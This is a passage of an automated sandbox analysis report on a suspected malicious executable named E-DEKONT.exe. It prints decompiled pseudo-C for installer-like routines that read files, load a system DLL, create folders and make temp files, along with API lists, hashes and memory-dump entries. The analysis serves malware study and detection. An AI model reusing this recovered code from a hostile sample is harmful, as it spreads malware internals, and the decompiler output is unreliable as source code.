                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%$@
                                                                            • API String ID: 551687249-3859443358
                                                                            • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                            • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                            • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                            • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 962 402644-40265d call 402c15 965 402663-40266a 962->965 966 402abf-402ac2 962->966 967 40266c 965->967 968 40266f-402672 965->968 969 402ac8-402ace 966->969 967->968 970 4027d6-4027de 968->970 971 402678-402687 call 4061e2 968->971 970->966 971->970 975 40268d 971->975 976 402693-402697 975->976 977 40272c-40272f 976->977 978 40269d-4026b8 ReadFile 976->978 979 402731-402734 977->979 980 402747-402757 call 405df7 977->980 978->970 981 4026be-4026c3 978->981 979->980 982 402736-402741 call 405e55 979->982 980->970 991 402759 980->991 981->970 984 4026c9-4026d7 981->984 982->970 982->980 987 402792-40279e call 4061c9 984->987 988 4026dd-4026ef MultiByteToWideChar 984->988 987->969 988->991 992 4026f1-4026f4 988->992 994 40275c-40275f 991->994 995 4026f6-402701 992->995 994->987 997 402761-402766 994->997 995->994 996 402703-402728 SetFilePointer MultiByteToWideChar 995->996 996->995 998 40272a 996->998 999 4027a3-4027a7 997->999 1000 402768-40276d 997->1000 998->991 1001 4027c4-4027d0 SetFilePointer 999->1001 1002 4027a9-4027ad 999->1002 1000->999 1003 40276f-402782 1000->1003 1001->970 1004 4027b5-4027c2 1002->1004 1005 4027af-4027b3 1002->1005 1003->970 1006 402784-40278a 1003->1006 1004->970 1005->1001 1005->1004 1006->976 1007 402790 1006->1007 1007->970
                                                                            C-Code - Quality: 83%
                                                                            			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061E2(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E55( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DF7( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061C9( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                            0x00402644
                                                                            0x00402646
                                                                            0x00402649
                                                                            0x0040264b
                                                                            0x0040264e
                                                                            0x00402653
                                                                            0x00402657
                                                                            0x0040265a
                                                                            0x0040265d
                                                                            0x00402abf
                                                                            0x00402ac2
                                                                            0x00402663
                                                                            0x00402663
                                                                            0x0040266a
                                                                            0x0040266c
                                                                            0x0040266c
                                                                            0x00402672
                                                                            0x004027d6
                                                                            0x004027d6
                                                                            0x004027d9
                                                                            0x004027de
                                                                            0x004015b6
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00000000
                                                                            0x00402678
                                                                            0x00402679
                                                                            0x00402684
                                                                            0x00402687
                                                                            0x00402693
                                                                            0x00402697
                                                                            0x0040272f
                                                                            0x00402747
                                                                            0x00402757
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040269d
                                                                            0x0040269d
                                                                            0x004026a0
                                                                            0x004026a1
                                                                            0x004026a4
                                                                            0x004026a9
                                                                            0x004026b0
                                                                            0x004026b8
                                                                            0x00000000
                                                                            0x004026be
                                                                            0x004026be
                                                                            0x004026c3
                                                                            0x00000000
                                                                            0x004026c9
                                                                            0x004026c9
                                                                            0x004026d1
                                                                            0x004026d4
                                                                            0x004026d7
                                                                            0x00402792
                                                                            0x00402799
                                                                            0x004026dd
                                                                            0x004026e3
                                                                            0x004026ef
                                                                            0x00402759
                                                                            0x00402759
                                                                            0x004026f1
                                                                            0x004026f1
                                                                            0x004026f4
                                                                            0x004026f6
                                                                            0x004026f6
                                                                            0x004026f6
                                                                            0x004026f9
                                                                            0x004026fe
                                                                            0x00402701
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402703
                                                                            0x00402706
                                                                            0x0040270e
                                                                            0x0040271a
                                                                            0x00402728
                                                                            0x00000000
                                                                            0x0040272a
                                                                            0x00000000
                                                                            0x0040272a
                                                                            0x00000000
                                                                            0x00402728
                                                                            0x004026f6
                                                                            0x0040275c
                                                                            0x0040275f
                                                                            0x00000000
                                                                            0x00402761
                                                                            0x00402766
                                                                            0x004027a7
                                                                            0x004027c9
                                                                            0x004027d0
                                                                            0x004027b5
                                                                            0x004027b5
                                                                            0x004027b8
                                                                            0x004027bb
                                                                            0x004027be
                                                                            0x004027be
                                                                            0x00000000
                                                                            0x0040276f
                                                                            0x0040276f
                                                                            0x00402772
                                                                            0x00402775
                                                                            0x0040277b
                                                                            0x0040277f
                                                                            0x00402782
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402782
                                                                            0x00402766
                                                                            0x0040275f
                                                                            0x004026d7
                                                                            0x004026c3
                                                                            0x004026b8
                                                                            0x00000000
                                                                            0x00402784
                                                                            0x00402784
                                                                            0x00402787
                                                                            0x00402790
                                                                            0x00000000
                                                                            0x00402687
                                                                            0x00402672
                                                                            0x00402ac8
                                                                            0x00402ace

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                              • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                            • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                            • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                            • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1008 4065ec-40660c GetSystemDirectoryW 1009 406610-406612 1008->1009 1010 40660e 1008->1010 1011 406623-406625 1009->1011 1012 406614-40661d 1009->1012 1010->1009 1014 406626-406659 wsprintfW LoadLibraryExW 1011->1014 1012->1011 1013 40661f-406621 1012->1013 1013->1014
                                                                            C-Code - Quality: 100%
                                                                            			E004065EC(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                            0x00406603
                                                                            0x0040660c
                                                                            0x0040660e
                                                                            0x0040660e
                                                                            0x00406612
                                                                            0x00406625
                                                                            0x0040661f
                                                                            0x0040661f
                                                                            0x0040661f
                                                                            0x0040663e
                                                                            0x00406652
                                                                            0x00406659

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                            • wsprintfW.USER32 ref: 0040663E
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1110 4057b5-405800 CreateDirectoryW 1111 405802-405804 1110->1111 1112 405806-405813 GetLastError 1110->1112 1113 40582d-40582f 1111->1113 1112->1113 1114 405815-405829 SetFileSecurityW 1112->1114 1114->1111 1115 40582b GetLastError 1114->1115 1115->1113
                                                                            C-Code - Quality: 100%
                                                                            			E004057B5(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                            0x004057c0
                                                                            0x004057c4
                                                                            0x004057c7
                                                                            0x004057cd
                                                                            0x004057d1
                                                                            0x004057d5
                                                                            0x004057dd
                                                                            0x004057e4
                                                                            0x004057ea
                                                                            0x004057f1
                                                                            0x004057f8
                                                                            0x00405800
                                                                            0x00405802
                                                                            0x00000000
                                                                            0x00405802
                                                                            0x0040580c
                                                                            0x00405813
                                                                            0x00405829
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040582b
                                                                            0x0040582f

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                            • GetLastError.KERNEL32 ref: 0040580C
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                            • GetLastError.KERNEL32 ref: 0040582B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 3449924974-3370423016
                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1116 405da3-405daf 1117 405db0-405de4 GetTickCount GetTempFileNameW 1116->1117 1118 405df3-405df5 1117->1118 1119 405de6-405de8 1117->1119 1120 405ded-405df0 1118->1120 1119->1117 1121 405dea 1119->1121 1121->1120
                                                                            C-Code - Quality: 100%
                                                                            			E00405DA3(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                            0x00405da9
                                                                            0x00405daf
                                                                            0x00405db0
                                                                            0x00405db0
                                                                            0x00405db5
                                                                            0x00405db6
                                                                            0x00405db9
                                                                            0x00405dbe
                                                                            0x00405dc1
                                                                            0x00405dcb
                                                                            0x00405dd8
                                                                            0x00405ddc
                                                                            0x00405de4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405de8
                                                                            0x00000000
                                                                            0x00405dea
                                                                            0x00405dea
                                                                            0x00405dea
                                                                            0x00405ded
                                                                            0x00405df0
                                                                            0x00405df0
                                                                            0x00405df3
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405DC1
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\E-DEKONT.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF), ref: 00405DDC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-1127406209
                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 92%
                                                                            			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                            0x10001759
                                                                            0x10001759
                                                                            0x10001759
                                                                            0x10001763
                                                                            0x1000176b
